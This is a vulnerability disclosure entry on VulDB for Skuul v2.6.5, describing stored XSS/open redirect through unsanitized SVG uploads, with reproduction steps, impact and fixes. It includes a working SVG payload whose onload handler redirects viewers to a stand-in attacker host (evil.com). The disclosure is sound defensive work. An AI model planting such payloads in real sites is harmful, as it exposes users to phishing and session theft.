제출 #689012: yungifez Skuul v2.6.5 Open Redirect정보

제목	yungifez Skuul v2.6.5 Open Redirect
설명	Skuul version 2.6.5 allows the upload of unsanitized SVG files in the Edit School section. Since the application serves uploaded SVGs directly without sanitization or content-type enforcement, attackers can embed JavaScript or redirection payloads inside SVGs. When a user or administrator opens the uploaded image in a new tab, the browser executes the embedded script, resulting in a stored cross-site scripting (XSS) or open redirect attack. Steps to Reproduce: 1. Log in to the Skuul http://127.0.0.1:8000/login as Admin 2. Navigate to: http://sk.htb:8000/dashboard/schools/1/edit 3. Upload the SVG file with following content: <?xml version="1.0" standalone="yes"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" onload="window.location='https://evil.com/'"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> </svg> 4. If any user such as (Super Admin, Student, Teacher or Parent) Open Image in New Tab. 5. The browser will automatically redirect to https://evil.com/. Impact: -) Automatic redirection to attacker-controlled websites (phishing/malware risk). -) Stored XSS possibility through malicious SVG payloads. -) User credential theft or session hijacking if same-origin. -) High impact if admin account is compromised, affecting all users. -) Loss of user trust and potential reputational damage to the platform. Recommendation: -) Disallow SVG uploads entirely, or -) Sanitize SVGs using libraries like DOMPurify, sanitize-svg, or similar before storage. -) Serve SVGs with the Content-Type: image/svg+xml header and force download where possible. -) Store and serve only rasterized versions (e.g., PNG/JPEG). Affected Version: Skuul v2.6.5 Product Source: -) Website: https://yungifez.github.io/skuul.org/ -) GitHub Repository: https://github.com/yungifez/skuul Credits Zeeshan Khan https://www.thezeeshankhan.site/
원천	⚠️ https://gist.github.com/thezeekhan/7fc54fd44bc5f318be0350b367b2d8ff
사용자	Zeeshan Khan (UID 91384)
제출	2025. 11. 04. PM 05:57 (8 개월 ago)
모더레이션	2025. 11. 29. PM 01:59 (25 days later)
상태	수락
VulDB 항목	333788 [yungifez Skuul School Management System 까지 2.6.5 SVG File edit 크로스 사이트 스크립팅]
포인트들	20

◂ 이전 개요 다음 ▸

Want to stay up to date on a daily basis?

Enable the mail alert feature now!